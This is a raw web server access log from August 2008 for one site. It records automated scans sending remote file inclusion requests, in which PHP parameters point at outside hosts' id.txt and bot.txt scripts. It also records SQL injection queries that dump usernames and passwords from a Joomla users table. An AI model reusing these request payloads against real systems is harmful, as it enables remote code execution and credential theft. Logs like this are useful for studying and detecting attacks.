72.29.68.220 - - [31/Aug/2008:10:47:33 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:47:45 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:10:47:48 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:51 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:51 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:47:58 -0700] "GET /logs/access_080611.log//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:48:03 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:48:03 -0700] "GET /logs/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:48:03 -0700] "GET /index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.239.119.130 - - [31/Aug/2008:10:48:04 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 90137 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:48:05 -0700] "GET /logs/access_080820.log/includes/ktedit/toolbar.php?dirDepth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:48:27 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:48:27 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.136.212 - - [31/Aug/2008:10:48:27 -0700] "GET /logs/access_080614.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:48:28 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.136.212 - - [31/Aug/2008:10:48:28 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:48:52 -0700] "GET /logs/access_080715.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:48:52 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:48:54 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:48:54 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:49:10 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.museoscout.com.ar//components/com_extcalendar/lib/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:49:10 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.museoscout.com.ar//components/com_extcalendar/lib/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:49:33 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:49:33 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.194.170 - - [31/Aug/2008:10:49:35 -0700] "GET /logs/access_080103.log/setup/tables_update.inc.php?appdir=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.200.194.170 - - [31/Aug/2008:10:49:36 -0700] "GET /logs/access_080205.log/setup/tables_update.inc.php?appdir=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:49:37 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:49:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:49:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:49:41 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:49:41 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:49:42 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:49:44 -0700] "GET /logs/access_080621.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:49:44 -0700] "GET /logs/index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:49:45 -0700] "GET /index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89507 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:49:45 -0700] "GET /logs/access_080621.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:49:51 -0700] "GET /logs/access_080726.log/index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:49:52 -0700] "GET /index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89507 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:49:53 -0700] "GET /logs/index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:50:03 -0700] "GET /logs/access_080507.log/index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:10:50:03 -0700] "GET /inc/header.php/step_one.php?server_inc=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:13 -0700] "GET /logs/access_080622.log/index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:14 -0700] "GET /index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:14 -0700] "GET /logs/index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:50:17 -0700] "GET /logs/access_080621.log/includes/ktedit/toolbar.php?dirDepth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:50:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:50:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:30 -0700] "GET /logs/access_080627.log/index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:50:42 -0700] "GET /logs/access_071222.log/errors.php?error=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:50:42 -0700] "GET /errors.php?error=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:10:50:42 -0700] "GET /logs/errors.php?error=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:49 -0700] "GET /logs/index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:50:50 -0700] "GET /index2.php?showpage=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [31/Aug/2008:10:50:57 -0700] "GET /logs//main.php?page=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.55.113.226 - - [31/Aug/2008:10:50:57 -0700] "GET //main.php?page=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:51:02 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:51:02 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:51:04 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.78 - - [31/Aug/2008:10:51:04 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:04 -0700] "GET /logs/access_080122.log//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:06 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:08 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:51:12 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=uid=32021(awstats)%20gid=32023(awstats)%20groups=32023(awstats)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:15 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:18 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:51:18 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:23 -0700] "GET /logs/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:23 -0700] "GET /errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:23 -0700] "GET /logs/access_080809.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:24 -0700] "GET /logs/access_080315.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:27 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:30 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:33 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:35 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89600 "-" "libwww-perl/5.812" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:44 -0700] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:44 -0700] "GET ///vwar/backup/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:51:45 -0700] "GET /logs///vwar/backup/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:46 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:51:48 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:51:57 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:10:51:59 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:10:51:59 -0700] "GET /logs/access_080629.log/admincp/auth/checklogin.php?cfgProgDir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:10:51:59 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:10:51:59 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:10:52:01 -0700] "GET /logs/access_080626.log/admincp/auth/checklogin.php?cfgProgDir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [31/Aug/2008:10:52:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chakde.net/orca/js/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:52:16 -0700] "GET /logs/access_080507.log//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:52:17 -0700] "GET //index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 200 89511 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:52:17 -0700] "GET /logs//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:52:21 -0700] "GET /logs/access_080728.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:52:21 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:52:21 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:52:22 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:52:22 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:52:25 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89600 "-" "libwww-perl/5.812" "www.dmulk.com"
193.207.106.54 - - [31/Aug/2008:10:52:25 -0700] "GET /logs/access_080717.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:52:25 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89616 "-" "libwww-perl/5.812" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:52:36 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:52:36 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:52:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:52:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:52:39 -0700] "GET /logs/access_080718.log//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:52:40 -0700] "GET /logs/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:10:52:40 -0700] "GET /errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:52:52 -0700] "GET /logs/access_080621.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:10:52:57 -0700] "GET /logs/access_080803.log///vwar/backup/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:53:28 -0700] "GET /logs/access_080708.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:53:29 -0700] "GET /logs/access_080601.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:53:35 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:53:42 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:53:42 -0700] "GET /logs/access_080708.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:53:43 -0700] "GET /logs/errors.php?error=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:53:43 -0700] "GET /errors.php?error=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:53:44 -0700] "GET /logs/access_080601.log/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:53:57 -0700] "GET /logs/access_080122.log//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:53:58 -0700] "GET //?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 89632 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:54:00 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.188 - - [31/Aug/2008:10:54:00 -0700] "GET /logs//?custompluginfile[]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 63005 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:10:54:01 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
